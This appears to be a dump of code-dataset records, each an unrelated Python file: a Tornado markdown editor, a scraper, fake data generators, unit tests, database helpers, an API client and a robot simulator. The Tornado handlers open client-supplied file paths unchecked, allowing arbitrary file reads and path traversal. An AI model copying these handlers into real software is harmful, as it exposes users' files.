tornado.ioloop\nimport tornado.web\nimport tornado.gen as gen\nfrom tornado.web import asynchronous\nimport tornado.websocket\n\nfrom mdi.main import settings, g, urls\n\n\nclass BaseHandler(tornado.web.RequestHandler):\n def render(self, path, **kwargs):\n g.render.render(self, path, **kwargs)\n\n def macro(self, path):\n return g.render.macro(path)\n\n def input(self, name, default=None, strip=True):\n return super(BaseHandler, self).get_argument(name, default, strip)\n\n def prepare(self):\n '''每次都检查文件'''\n conf = json.loads(open(settings.CONF_PATH).read())\n for p in conf.get('paths', []):\n if not osp.exists(p):\n conf['paths'].remove(p)\n open(settings.CONF_PATH, 'w').write(json.dumps(conf))\n\n\nclass Image(BaseHandler):\n def get(self, path):\n conf = json.loads(open(settings.CONF_PATH).read())\n last = conf['last']\n ext = last.rsplit('.')[-1].replace('jpg', 'jpeg')\n\n import urllib\n path = urllib.unquote(path)\n path = osp.join(osp.dirname(last), 'img', path)\n self.set_header('Content-Type', 'image/%s' % ext)\n self.write(open(path, 'rb').read())\n\n\nclass Editor(BaseHandler):\n def get(self):\n conf = json.loads(open(settings.CONF_PATH).read())\n paths = conf.get('paths', [])\n last = conf.get('last', '')\n md = ''\n if last:\n md = open(last).read().decode('utf-8')\n self.render('editor.html', md=md, paths=paths, last=last)\n\n\nclass SocketHandler(tornado.websocket.WebSocketHandler):\n @asynchronous\n @gen.coroutine\n def tailstream(self, msg):\n import time\n import os\n\n path = osp.expanduser(msg['path'].strip())\n lm = msg['lm']\n\n timeout = msg.get('to', 1)\n\n conf = json.loads(open(settings.CONF_PATH).read())\n if conf.get('last') != path:\n conf['last'] = path\n open(settings.CONF_PATH, 'w').write(json.dumps(conf))\n\n while 1:\n suc = osp.exists(path)\n if not suc:\n self.write_message({'err': True, 'msg': u'文件不存在!'})\n return\n\n mtime = os.stat(path)[8]\n if lm != mtime:\n data = open(path).read()\n self.write_message({'lm': mtime, 'data': data})\n lm = mtime\n\n yield gen.Task(\n tornado.ioloop.IOLoop.instance().add_timeout,\n time.time() + timeout)\n\n def on_message(self, msg):\n msg = json.loads(msg)\n self.tailstream(msg)\n\n\nclass AddPath(BaseHandler):\n def post(self):\n path = osp.expanduser(self.input('fullpath'))\n\n if not osp.exists(path):\n self.write({'err': True, 'msg': u'文件不存在!'})\n return\n\n if not osp.isfile(path):\n self.write({'err': True, 'msg': u'请输入一个文件名而不是目录名!'})\n return\n\n conf = json.loads(open(settings.CONF_PATH).read())\n paths = conf.get('paths', [])\n paths = set(paths)\n paths.add(path)\n conf['paths'] = list(paths)\n open(settings.CONF_PATH, 'w').write(json.dumps(conf))\n\n self.write({'err': False})\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n us = []\n env = globals()\n for route in urls.urls:\n if len(route) > 2:\n continue\n url, handler_name = route\n handler = env.get(handler_name, None)\n if handler is not None:\n us.append((url, handler))\n else:\n logging.warning('`{0}` not found'.format(handler_name))\n tornado.web.Application.__init__(self, us, **settings.TORNADO_SETTINGS)\n\n\napplication = Application()\n","sub_path":"mdi/main/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"371100663","text":"# coding=utf-8\n# This is a sample Python script.\n\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom openpyxl.worksheet.worksheet import Worksheet\nfrom requests.sessions import Session\nimport requests\nimport openpyxl\n\nlogin_html = ''\nparams = dict()\nparams['loginId'] = ''\nparams['loginPwd'] = ''\nparams['mode'] = 'login'\n\nmodelId = []\nfileName = 'result.xlsx'\n\ntotalCount = 1\npageCount = 2\nonePageGoodsCount = 2\n\nwb = openpyxl.Workbook()\nsheet = wb.active\n\n\ndef get_html(url):\n _html = \"\"\n resp = requests.get(url)\n if resp.status_code == 200:\n _html = resp.text\n return _html\n\n\ndef setSession():\n login = session_data.post(login_html, params)\n login.raise_for_status()\n # 세션 설정을 위하여 최초한번 로드???\n loadPage(\"9800800056\")\n\n\ndef loadPage(keywordValue):\n # keywordValue = \"5012035901738\"\n crawl_url = \"\" + str(keywordValue) + \"\"\n login = session_data.get(crawl_url)\n soupData = BeautifulSoup(login.content, 'html.parser') # type: BeautifulSoup\n return soupData\n\n\ndef setExcelColumn():\n sheet.cell(1, 1).value = \"번호\"\n sheet.cell(1, 2).value = \"상품명\"\n sheet.cell(1, 3).value = \"모델명\"\n sheet.cell(1, 4).value = \"판매여부\"\n\n\n# remove dummy data type-2\ndef getTitle(originResult):\n arrMid = originResult.split(\" title=\")\n arrLast = arrMid[1].split(\" width=\")\n return arrLast[0]\n\n\ndef getData(originResult):\n arr = str(originResult).split('item-display type-gallery')\n # print(arr[1])\n arrMid = arr[1].split(\"\")\n # print(arrMid)\n arrLast = arrMid[1].split(\"\")\n # print(arrLast[0])\n return arrLast[0]\n\n\ndef ExcelRead():\n global modelId\n global totalCount\n workbook = openpyxl.load_workbook('list.xlsx')\n ws = workbook['name']\n\n for cell in ws['G']: # A열의 모든 셀을 확인\n # print(str(cell.value).strip())\n typeCase = \"0\"\n devalue = str(cell.value).strip()\n if devalue == \"None\":\n # print(\"is None\")\n typeCase = \"1\"\n elif devalue == \"모델명\":\n # print(\"is 모델명\")\n typeCase = \"2\"\n else:\n # print(str(cell.value).strip())\n modelId.append(devalue)\n\n return modelId\n\n\ndef dataArray(soupData):\n galleryData = soupData.find('div', class_='item-display type-gallery')\n thumbnailData = galleryData.find_all('div', class_='thumbnail')\n return thumbnailData\n\n\ndef excelWrite(keywordValue, resultData):\n global totalCount\n checkWord = \"soldout-img\"\n\n print(totalCount)\n print(resultData)\n print(len(resultData))\n # testData.\n # href.find(\"a\")[\"href\"]\n # 파싱 방법 찾음.\n print(resultData.find(\"img\")[\"title\"])\n\n sheetNumBer = totalCount + 1\n sheet.cell(sheetNumBer, 1).value = str(totalCount) # \"번호\"\n sheet.cell(sheetNumBer, 2).value = str(getTitle(str(resultData)))\n sheet.cell(sheetNumBer, 3).value = str(keywordValue)\n\n if checkWord in str(resultData):\n sheet.cell(sheetNumBer, 4).value = str(\"품절\")\n else:\n sheet.cell(sheetNumBer, 4).value = str(\"판매중\")\n wb.save(fileName)\n totalCount += 1\n\n\ndef checkData(keywordValue):\n global totalCount\n\n soupData = loadPage(keywordValue)\n resultArray = dataArray(soupData) # 검색 결과 배열\n\n j = 0\n while j < len(resultArray):\n excelWrite(keywordValue, resultArray[j])\n j += 1\n\n\nif __name__ == '__main__':\n session_data = requests.session() # type: Session\n totalCount = 1\n print(\"[START]\")\n setSession()\n modelId = ExcelRead()\n\n wb = openpyxl.Workbook()\n sheet = wb.active\n setExcelColumn()\n\n i = 0\n while i < len(modelId):\n checkData(str(modelId[i]))\n # wb.save(fileName)\n i += 1\n\n print('[END]')\n","sub_path":"crawling/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"350570018","text":"import pandas as pd, random\nfrom korean_name_generator import namer\n\nclass DataCreate:\n def __init__(self, memberNumber=10000, dataCount=100):\n self.memberNumber = memberNumber\n self.dataCount = dataCount\n\n def memberNumberCreate(self):\n return [self.memberNumber + i for i in range(1, self.dataCount+1)]\n\n def nameCreate(self, maleRatio=0.7, femaleRatio=0.3):\n maleName = [namer.generate(True) for _ in range(int(self.dataCount * maleRatio))]\n femaleName = [namer.generate(False) for _ in range(int(self.dataCount * femaleRatio))]\n return maleName + femaleName\n\n def genderList(self, maleRatio=0.7, femaleRatio=0.3):\n male = ['male' for _ in range(int(self.dataCount * maleRatio))]\n female = ['female' for _ in range(int(self.dataCount * femaleRatio))]\n return male + female\n\n def phoneNumberCreate(self):\n result = []\n for _ in range(self.dataCount):\n mid = str(random.randrange(1, 9999))\n if len(mid) < 4:\n mid = ('0' * (4-len(mid))) + mid\n\n bottom = str(random.randrange(1, 9999))\n if len(bottom) < 4:\n bottom = ('0' * (4-len(bottom))) + bottom\n\n result.append(f'010-{mid}-{bottom}')\n\n return result\n\n def ageCreate(self, start, end):\n return [random.randrange(start, end) for _ in range(self.dataCount)]\n\n def birthCreate(self):\n result = []\n for _ in range(self.dataCount):\n month = random.randrange(1, 12)\n day = random.randrange(1, 31)\n\n if month == 2:\n if day > 28:\n day = 28\n\n result.append(f'{month}월 {day}일')\n\n return result\n\nif __name__ == '__main__':\n data = DataCreate()\n\n memberNumber = data.memberNumberCreate()\n nameList = data.nameCreate()\n genderList = data.genderList()\n age = data.ageCreate(20, 80)\n birth = data.birthCreate()\n phoneNumber = data.phoneNumberCreate()\n\n datas = {\n '회원번호': memberNumber,\n '이름': nameList,\n '성별': genderList,\n '나이': age,\n '생일': birth,\n '전화번호': phoneNumber\n }\n df = pd.DataFrame(datas)\n\n df.to_excel('test.xlsx')\n","sub_path":"User/LRTK/Code/Old/sample_excel.py","file_name":"sample_excel.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"34187942","text":"import sys\nfrom unittest import TestCase\n\nfrom scattertext.viz.HTMLVisualizationAssembly import HTMLVisualizationAssembly\nfrom scattertext.viz.VizDataAdapter import VizDataAdapter\n\n\nclass TestHTMLVisualizationAssembly(TestCase):\n\tdef test_main(self):\n\t\tassembler = self.make_assembler()\n\t\thtml = assembler.to_html()\n\t\tif sys.version_info.major == 2:\n\t\t\tself.assertEqual(type(html), unicode)\n\t\telse:\n\t\t\tself.assertEqual(type(html), str)\n\t\tself.assertFalse('' in html)\n\t\tself.assertTrue('Republican' in html)\n\n\tdef test_protocol_is_https(self):\n\t\thtml = self.make_assembler().to_html(protocol='https')\n\t\tself.assertTrue('https://' in html)\n\t\tself.assertFalse('http://' in html)\n\n\tdef test_protocol_is_http(self):\n\t\thtml = self.make_assembler().to_html(protocol='http')\n\t\tself.assertFalse('https://' in html)\n\t\tself.assertTrue('http://' in html)\n\n\tdef test_protocol_defaults_to_http(self):\n\t\tself.assertEqual(self.make_assembler().to_html(protocol='http'),\n\t\t self.make_assembler().to_html(), )\n\n\tdef test_raise_invalid_protocol_exception(self):\n\t\twith self.assertRaisesRegexp(BaseException,\n\t\t \"Invalid protocol: ftp. Protocol must be either http or https.\"):\n\t\t\tself.make_assembler().to_html(protocol='ftp')\n\n\tdef test_height_width_default(self):\n\t\tassembler = self.make_assembler()\n\t\tself.assertEqual(assembler._get_build_viz_call(), \"buildViz(undefined,undefined);\")\n\n\tdef test_height_width_nondefault(self):\n\t\tvisualization_data = self.make_adapter()\n\t\tself.assertEqual((HTMLVisualizationAssembly(visualization_data, width_in_pixels=1000)\n\t\t ._get_build_viz_call()),\n\t\t \"buildViz(1000,undefined);\")\n\n\t\tself.assertEqual((HTMLVisualizationAssembly(visualization_data, height_in_pixels=60)\n\t\t ._get_build_viz_call()),\n\t\t \"buildViz(undefined,60);\")\n\n\t\tself.assertEqual((HTMLVisualizationAssembly(visualization_data,\n\t\t height_in_pixels=60,\n\t\t width_in_pixels=1000)\n\t\t ._get_build_viz_call()),\n\t\t \"buildViz(1000,60);\")\n\n\tdef make_assembler(self):\n\t\tvisualization_data = self.make_adapter()\n\t\tassembler = HTMLVisualizationAssembly(visualization_data)\n\t\treturn assembler\n\n\tdef make_adapter(self):\n\t\twords_dict = {\"info\": {\"not_category_name\": \"Republican\", \"category_name\": \"Democratic\"},\n\t\t \"data\": [{\"y\": 0.33763837638376387, \"term\": \"crises\", \"ncat25k\": 0,\n\t\t \"cat25k\": 1, \"x\": 0.0, \"s\": 0.878755930416447},\n\t\t {\"y\": 0.5, \"term\": \"something else\", \"ncat25k\": 0,\n\t\t \"cat25k\": 1, \"x\": 0.0,\n\t\t \"s\": 0.5}]}\n\t\tvisualization_data = VizDataAdapter(words_dict)\n\t\treturn visualization_data\n","sub_path":"scattertext/test/test_HTMLVisualizationAssembly.py","file_name":"test_HTMLVisualizationAssembly.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"647290756","text":"import os\r\nimport psycopg2\r\n\r\n\r\nDATABASE_URL = os.environ['DATABASE_URL']\r\nconn = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n# try:\r\n# DATABASE_URL = os.environ['DATABASE_URL']\r\n# conn = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n# except:\r\n# print(\"Database not connected\")\r\n\r\n\r\ncur = conn.cursor()\r\n\r\ndef create_results(user_email, ip, access_date, user_decision, url, title, ml_result, highlight_result):\r\n row_data = (user_email, ip, access_date, user_decision, url, title, ml_result, highlight_result)\r\n new_row = \"INSERT INTO user_data(user_email, ip, access_date, user_decision, url, title, ml_result, highlight_result) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\r\n cur.execute(new_row, row_data)\r\n conn.commit()\r\n\r\n\r\n\r\n\r\ndef update_user_decision(user_email, user_decision):\r\n latest_entry = \"SELECT * FROM user_data WHERE user_email = %s ORDER BY id DESC LIMIT 1\"\r\n cur.execute(latest_entry, [user_email])\r\n result = cur.fetchall()\r\n for row in result:\r\n row_number = row[0]\r\n update_user_answer = \"\"\" UPDATE user_data\r\n SET\r\n user_decision = %s\r\n WHERE\r\n id = %s\"\"\"\r\n values = (user_decision, row_number)\r\n cur.execute(update_user_answer, values)\r\n conn.commit()\r\n","sub_path":"backend/datamanager.py","file_name":"datamanager.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"488479233","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Library/Python/3.7/site-packages/tripgo_parser/get.py\n# Compiled at: 2020-01-31 20:22:28\n# Size of source mod 2**32: 5366 bytes\nimport os, requests, json, datetime, time\n\nclass Response:\n\n def __init__(self, key, origlat, origlon, destlat, destlon, startime, date, tripid='', modes=None, allModes=False, bestOnly=False):\n self.tripid = tripid\n self.origlat = origlat\n self.origlon = origlon\n self.destlat = destlat\n self.destlon = destlon\n self.startime = startime\n self.orig = '(' + str(origlat) + ',' + str(origlon) + ')'\n self.dest = '(' + str(destlat) + ',' + str(destlon) + ')'\n self.startime = startime\n self.allModes = allModes\n self.bestOnly = bestOnly\n self.modes = modes if modes is not None else []\n self.startimeTimestamp = self.dateToTimestamp(date) + int(startime) * 60\n self.fileExists = False\n self.usageExceeded = False\n self.parameters = self.create_parameters()\n self.headers = {'X-TripGo-Key': key}\n\n def create_parameters(self):\n parameters = {'v':11, \n 'from':self.orig, \n 'to':self.dest, \n 'departAfter':int(self.startimeTimestamp), \n 'bestOnly':self.bestOnly}\n if len(self.modes) != 0:\n parameters.update({'modes': self.modes})\n else:\n parameters.update({'allModes': True})\n return parameters\n\n def fetch(self):\n while True:\n try:\n results = requests.get('https://api.tripgo.com/v1/routing.json', params=(self.parameters),\n headers=(self.headers))\n data = results.json()\n print('Successful fetch from %s' % results.url)\n self.checkUsageLimit(data)\n if self.usageExceeded:\n print('Error: API usage exceeded. Waiting 60 seconds...')\n time.sleep(60)\n continue\n return data\n except Exception as e:\n try:\n print('Error: ' + str(e.message))\n print('Retrying in 5...')\n time.sleep(5)\n continue\n finally:\n e = None\n del e\n\n def save(self, destination_folder, unique_id=''):\n directory = self.dir_path(destination_folder)\n path, id, file_exists = self.file_path(directory, unique_id)\n if file_exists:\n print('File {} already exists.'.format(str(id)))\n else:\n data = self.fetch()\n with open(path, 'w') as (f):\n json.dump(data, f)\n return True\n\n def dir_path(self, destination_folder):\n cwd = os.getcwd()\n directory = os.path.join(cwd, destination_folder)\n dirExists = os.path.exists(directory)\n if not dirExists:\n os.mkdir(destination_folder)\n return directory\n\n def file_path(self, directory, unique_id=''):\n md = '-'.join(self.modes) if self.modes is not [] else ''\n if unique_id == '' and self.tripid == '':\n olt = self.origlat[-4:]\n oln = self.origlon[-4:]\n dlt = self.destlat[-4:]\n dln = self.destlon[-4:]\n unique_id = '{}-{}-{}-{}-{}{}.json'.format(olt, oln, dlt, dln, self.startime, md)\n else:\n if unique_id == '':\n if self.tripid != '':\n if self.modes == []:\n unique_id = '{}-{}.json'.format(self.tripid, self.startime)\n else:\n unique_id = '{}-{}-{}.json'.format(self.tripid, self.startime, md)\n else:\n unique_id = ''.join([unique_id, '.json'])\n path = os.path.join(directory, unique_id)\n pathExists = os.path.exists(path)\n return (\n path, unique_id, pathExists)\n\n def dateToTimestamp(self, dateString):\n dateArray = dateString.split('/')\n dateArray = [int(i) for i in dateArray]\n currentYear = datetime.datetime.now().year\n timestamp = datetime.datetime(currentYear + 1, dateArray[1], dateArray[0]).timestamp()\n return int(timestamp) + 36000\n\n def checkUsageLimit(self, data):\n try:\n if 'usage' in data['error']:\n self.usageExceeded = True\n except:\n self.usageExceeded = False","sub_path":"pycfiles/tripgo_parser-0.3.0.macosx-10.14-x86_64.tar/get.cpython-37.py","file_name":"get.cpython-37.py","file_ext":"py","file_size_in_byte":4568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"12124314","text":"import time\r\nlist = []\r\nprint(\"Welcome To GTIN-8 Version 0.8.1\")\r\nanswer_1 = 1\r\nwhile (answer_1 == 1):\r\n\r\n def option1():\r\n count = 7\r\n index = 0\r\n list = []\r\n for index in range(count):\r\n\r\n print(\"Enter a single number then press enter\")\r\n number = int(input())\r\n list.insert(index, number)\r\n \r\n GTIN8_1 = list[0] * 3\r\n GTIN8_2 = list[1] * 1\r\n GTIN8_3 = list[2] * 3\r\n GTIN8_4 = list[3] * 1\r\n GTIN8_5 = list[4] * 3\r\n GTIN8_6 = list[5] * 1\r\n GTIN8_7 = list[6] * 3\r\n GTIN_8_8 = GTIN8_1 + GTIN8_2 + GTIN8_3 + GTIN8_4 + GTIN8_5 + GTIN8_6 + GTIN8_7\r\n GTIN_8_8_round = round(GTIN_8_8, -1)\r\n \r\n \r\n if(GTIN_8_8 > GTIN_8_8_round):\r\n GTIN_8_8_round = GTIN_8_8_round + 10\r\n GTIN_8_8 = GTIN_8_8_round - GTIN_8_8\r\n list.append(GTIN_8_8)\r\n \r\n else:\r\n GTIN_8_8 = GTIN_8_8_round - GTIN_8_8\r\n list.append(GTIN_8_8)\r\n return list\r\n\r\n def GTIN_8_8():\r\n print(\"Your GTIN 8 product code is:\")\r\n print(list)\r\n answer_1 = 1\r\n\r\n def ValOption2():\r\n\r\n count = 8\r\n index = 0\r\n list = []\r\n\r\n for index in range(count):\r\n\r\n print(\"To validate the GTIN-8 Code\")\r\n print(\"Enter a single number then press enter\")\r\n number = int(input())\r\n list.insert(index, number)\r\n \r\n \r\n valGTIN8_1 = list[0] * 3\r\n valGTIN8_2 = list[1] * 1\r\n valGTIN8_3 = list[2] * 3\r\n valGTIN8_4 = list[3] * 1\r\n valGTIN8_5 = list[4] * 3\r\n valGTIN8_6 = list[5] * 1\r\n valGTIN8_7 = list[6] * 3\r\n valGTIN8_8 = list[7] * 1\r\n\r\n totalval = valGTIN8_1 + valGTIN8_2 + valGTIN8_3 + valGTIN8_4 + valGTIN8_5 + valGTIN8_6 + valGTIN8_7 + valGTIN8_8\r\n\r\n if totalval%10==0:\r\n print(\"Your GTIN-8 has successfully validated\")\r\n\r\n else:\r\n print(\"Your GTIN-8 has failed to validate\")\r\n\r\n answer_1 = 1\r\n \r\n\r\n print(\"To select a option input its number\")\r\n print(\"Option.1 Calculate the GTIN-8 product code from a seven digit number\")\r\n print(\"Option.2 Check the validity of an eight digit GTIN-8 code\")\r\n print(\"Option.3 View a generated GTIN-8\")\r\n \r\n menu_answer = input()\r\n\r\n\r\n if (menu_answer == \"1\"):\r\n list = option1()\r\n\r\n\r\n if (menu_answer == \"2\"):\r\n ValOption2()\r\n\r\n if (menu_answer == \"3\"):\r\n GTIN_8_8()\r\n","sub_path":"GTIN-8 Calculator.py","file_name":"GTIN-8 Calculator.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"62112252","text":"import sqlite3\n\ndef connect():\n con = sqlite3.connect(\"books.db\")\n cur = con.cursor()\n cur.execute(\"CREATE TABLE IF NOT EXISTS book (ID integer Primary Key, Title text, Author text, Year integer, ISBN integer)\")\n con.commit()\n con.close()\n\ndef insert(title=\"\",author=\"\",year=\"\",isbn=\"\"):\n con = sqlite3.connect(\"books.db\")\n cur = con.cursor()\n cur.execute(\"INSERT INTO book VALUES (NULL,?,?,?,?)\",(title,author,year,isbn)) # NULL tells python to sen auto incremented value for the firt column i.e. ID in book table\n con.commit()\n con.close()\n\ndef view():\n con = sqlite3.connect(\"books.db\")\n cur = con.cursor()\n cur.execute(\"SELECT * FROM book\")\n rows = cur.fetchall()\n con.close\n return rows\n\ndef search(title,author,year,isbn):\n con = sqlite3.connect(\"books.db\")\n cur = con.cursor()\n cur.execute(\"SELECT * FROM book WHERE Title=? OR Author=? OR Year=? OR ISBN=?\",(title,author,year,isbn))\n rows = cur.fetchall()\n con.close\n return rows\n\ndef delete(id):\n con = sqlite3.connect(\"books.db\")\n cur = con.cursor()\n cur.execute(\"DELETE FROM book WHERE id=?\",(id,)) #, is required after id for delete and update is single argument is passed\n con.commit()\n con.close()\n\ndef update(id,title,author,year,isbn):\n con = sqlite3.connect(\"books.db\")\n cur = con.cursor()\n cur.execute(\"UPDATE book SET Title=?, Author=?, Year=?, ISBN=? WHERE id=?\",(title,author,year,isbn,id))\n con.commit()\n con.close()\n\n#connect()\n#insert(\"Many Masters Many Slaves\",\"Dr Brian Weiss\",1976,987545421)\n#print(view())\n#delete(5)\n#update(3,\"Bhaag Milkha\",\"Milkha Singh\",2014,42456735)\n#print(search(author=\"Milkha Singh\"))\n#print(view())\n","sub_path":"DesktopApp/BackBookApp.py","file_name":"BackBookApp.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"21301731","text":"import os\n\nfrom imageai.Prediction import ImagePrediction\n\nPATH_HERE = os.getcwd()\nPATH_MODEL = os.path.join(PATH_HERE, \"resnet50_weights_tf_dim_ordering_tf_kernels.h5\")\nPATH_IMAGE_INPUT = os.path.join(PATH_HERE, \"image1.jpg\")\n\n\ndef main(path_model, path_img):\n prediction = ImagePrediction()\n prediction.setModelTypeAsResNet()\n prediction.setModelPath(path_model)\n prediction.loadModel()\n\n predictions, probabilities = prediction.predictImage(path_img, result_count=10)\n for eachPrediction, eachProbability in zip(predictions, probabilities):\n print(eachPrediction , \" : \" , eachProbability)\n\n\nif __name__ == '__main__':\n main(path_model=PATH_MODEL, path_img=PATH_IMAGE_INPUT)","sub_path":"examples/image_prediction.py","file_name":"image_prediction.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"480914","text":"import time\nimport P4Summary\nimport CopyBuildBackup\nimport JiraReadme\nimport os\n\ntimefreq = 1800\n\ndef main():\n while 1:\n\n print('')\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n start_time = time.time()\n try:\n os.system('E:\\\\Tool\\\\Install_Opengrok\\\\syn_opengrok.bat')\n CopyBuildBackup.main()\n print('')\n P4Summary.main()\n JiraReadme.main()\n\n except Exception as e:\n # log(str(e), level.error)\n print(str(e))\n pass\n finally:\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n print(\"time elapsed: {:.2f}s\".format(time.time() - start_time))\n print('Idle..............................')\n time.sleep(timefreq)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"auto.py","file_name":"auto.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"466925905","text":"from sys import stdin\r\ndef dfs(i,j):\r\n visit[i][j] = True\r\n x=[i,i-1,i-1,i-1,i,i+1,i+1,i+1]\r\n y=[j-1,j-1,j,j+1,j+1,j+1,j,j-1]\r\n for h in range(8):\r\n if x[h]>=0 and x[h]=0 and y[h] List[\"Trade\"]:\n return [Trade(symbol, side, r.price, r.amount) for r in order_book_rows]\n\n @classmethod\n def trade_from_binance_execution_report_event(cls, execution_report: Dict[str, any]) -> \"Trade\":\n execution_type: str = execution_report.get(\"x\")\n if execution_type != \"TRADE\":\n raise ValueError(f\"Invalid execution type '{execution_type}'.\")\n return Trade(execution_report[\"s\"],\n TradeType.BUY if execution_report[\"S\"] == \"BUY\" else TradeType.SELL,\n float(execution_report[\"L\"]),\n float(execution_report[\"l\"]))\n\n @classmethod\n def to_pandas(cls, trades: List):\n columns: List[str] = [\"symbol\", \"trade_side\", \"price\", \"quantity\"]\n data = [[\n trade.symbol,\n \"BUY\" if trade.side is TradeType.BUY else \"SELL\",\n trade.price,\n trade.amount,\n ] for trade in trades]\n return pd.DataFrame(data=data, columns=columns)\n","sub_path":"wings/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"489076860","text":"#!/usr/bin/python2\n\n# =============================================================================\n# Peter G. Adamczyk \n# 2018-10-11\n# Updated 2021-02-26\n# =============================================================================\n\n\nimport rospy\nimport traceback \nimport me439_mobile_robot_class_v00 as m439rbt\nfrom geometry_msgs.msg import Pose2D\nfrom dogrob_util.msg import ME439WheelSpeeds, ME439WheelAngles, ME439WheelDisplacements\n\n#==============================================================================\n# # Get parameters from rosparam\n#==============================================================================\nwheel_width = rospy.get_param('/wheel_width_actual')\nbody_length = rospy.get_param('/body_length')\nwheel_diameter = rospy.get_param('/wheel_diameter_actual')\nwheel_radius = wheel_diameter/2.0\n\n\nt_previous = None\nf = 100. # Simulation rate of the simulator node\nn = 10 # Publication rate of the Pose\n\ndef simulate(): \n global t_previous, f, n\n \n \n# =============================================================================\n# # Launch a node called \"mobile_robot_simulator\"\n# =============================================================================\n rospy.init_node('mobile_robot_simulator', anonymous=False)\n t_previous = rospy.get_rostime()\n# =============================================================================\n# #Create a mobile robot object from the Imported module \"me439_mobile_robot_class\"\n# =============================================================================\n robot = m439rbt.robot(wheel_width, body_length, wheel_radius)\n \n#==============================================================================\n# # Here start a Subscriber to the \"wheel_speeds_desired\" topic.\n#==============================================================================\n # NOTE the Callback to the set_wheel_speeds function of the robot class.\n # This will update \n # NOTE also the extra arguments to that callback: the Motor Encoders (both in a list)\n sub_wheel_speeds = rospy.Subscriber('/wheel_speeds_desired', ME439WheelSpeeds, set_wheel_speed_targets,robot) \n \n pub_robot_pose = rospy.Publisher('/robot_pose_simulated', Pose2D, queue_size = 1)\n robot_pose_message = Pose2D()\n pub_robot_wheel_angles = rospy.Publisher('/robot_wheel_angles_simulated', ME439WheelAngles, queue_size = 10)\n robot_wheel_angles_message = ME439WheelAngles()\n pub_robot_wheel_displacements = rospy.Publisher('/robot_wheel_displacements_simulated', ME439WheelDisplacements, queue_size = 10)\n robot_wheel_displacements_message = ME439WheelDisplacements()\n \n # Rate object to set a simulation rate\n r = rospy.Rate(f)\n \n# =============================================================================\n# # Loop to run the simulation\n# =============================================================================\n while not rospy.is_shutdown():\n # Count to n here to prevent publishing too often\n for ii in range(n): \n t_current = rospy.get_rostime()\n dt = (t_current - t_previous).to_sec()\n t_previous = t_current # save the current time as the previous time, for the next use. \n robot.integration_step(dt)\n \n \n r.sleep() # keep this node from exiting\n \n# =============================================================================\n# # when it gets here (every n-th simulation step) we want to actually publish the data\n# =============================================================================\n# # Maybe log the current position?\n# robot.append_current_position_to_history()\n \n # Now publish the pose\n robot_pose_message.x = robot.r_center_world[0]\n robot_pose_message.y = robot.r_center_world[1]\n robot_pose_message.theta = robot.theta\n pub_robot_pose.publish(robot_pose_message)\n \n # And the encoder angles\n robot_wheel_angles_message.ang_left = robot.left_wheel_angle\n robot_wheel_angles_message.ang_right = robot.right_wheel_angle\n pub_robot_wheel_angles.publish(robot_wheel_angles_message)\n \n # And the wheel displacements\n robot_wheel_displacements_message.d_left = robot.left_wheel_distance_traveled\n robot_wheel_displacements_message.d_right = robot.right_wheel_distance_traveled\n pub_robot_wheel_displacements.publish(robot_wheel_displacements_message)\n \n rospy.loginfo(pub_robot_pose)\n \n \n# =============================================================================\n# # Callback function to set wheel speeds in the robot object\n# =============================================================================\ndef set_wheel_speed_targets(msg_in, robot): \n global t_previous\n t_current = rospy.get_rostime()\n dt = (t_current - t_previous).to_sec()\n t_previous = t_current # save the current time as the previous time, for the next use. \n robot.integration_step(dt)\n robot.set_wheel_speeds(msg_in.v_left, msg_in.v_right)\n \n \n \n \n \n \nif __name__ == '__main__':\n try: \n simulate()\n except rospy.ROSInterruptException: \n traceback.print_exc()\n","sub_path":"mobrob/src/mobile_robot_kinematic_simulator.py","file_name":"mobile_robot_kinematic_simulator.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"296485751","text":"from unittest import TestCase\n\nfrom stellar_model import TransactionsResponse\nfrom stellar_model.model.horizon.transaction import Transaction\nfrom tests.response import load_response_file\n\n\nclass TestTransactionsResponse(TestCase):\n def test_valid(self):\n raw_data = load_response_file(\"transactions_response.json\")\n parsed_data = TransactionsResponse.parse_obj(raw_data)\n self.assertEqual(len(parsed_data.embedded.records), 100)\n for record in parsed_data.embedded.records:\n 